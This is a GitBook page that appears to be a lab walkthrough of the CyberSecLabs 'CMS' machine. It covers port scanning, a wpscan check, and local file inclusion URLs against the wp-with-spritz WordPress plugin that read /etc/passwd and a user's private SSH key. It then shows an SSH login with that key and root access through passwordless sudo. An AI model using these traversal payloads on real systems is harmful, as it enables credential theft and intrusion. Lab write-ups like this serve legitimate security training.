📔
Hack World
  • Welcome to Hack World
  • Writeup
    • Proving Grounds - Practice
      • AuthBy
      • Jacko
      • UT99
      • Sirol
      • Twiggy
      • Bratarina
      • Internal
      • Algernon
      • Metallus
      • Kevin
      • Helpdesk
      • Slort
      • Shenzi
      • Pelican
      • Walla
      • Zino
      • Nibbles
      • ZenPhoto
      • Wombo
    • CyberSecLabs
      • Lazy
      • Red
      • Shock
      • CMS
      • Debug
      • Leakage
      • Simple
      • Shares
      • Unroot
      • Outdated
      • Fuel
      • Pie
    • Vulnhub
      • Linux
        • BTRSys2.1
        • CyberSploit1
        • SunsetNoontide
    • HackTheBox
      • Cap
Powered by GitBook
On this page
  • nmap
  • Web enumeration
  • Exploitation
  • Exploitation
  • Privilege Escalation

Was this helpful?

  1. Writeup
  2. CyberSecLabs

CMS

PreviousShockNextDebug

Last updated 3 years ago

Was this helpful?

nmap

mkdir nmap
sudo rustscan -a 172.31.1.8 --ulimit 5000 -- -T4 -A -oA nmap/all-ports-service-scan

A web service is available on port 80

Web enumeration

Looks like the website is running on WordPress

Run wpscan and after a few seconds, looks like it is vulnerable to Local File Inclusion

wpscan --url <url> --api-token <token> | tee wpscan-root

Exploitation

We can use LFI to grab /etc/passwd

http://172.31.1.8/wp-content/plugins/wp-with-spritz/wp.spritz.content.filter.php?url=/../../../..//etc/passwd

Then grab the Private SSH Key of user angel

http://172.31.1.8/wp-content/plugins/wp-with-spritz/wp.spritz.content.filter.php?url=/../../../..//home/angel/.ssh/id_rsa

Exploitation

Log in via SSH using the id_rsa file we found.

chmod 600 angel_id_rsa
ssh -i ./angel_id_rsa angel@172.31.1.8

Privilege Escalation

We can run any sudo command without a password. Just run sudo su to log in as root.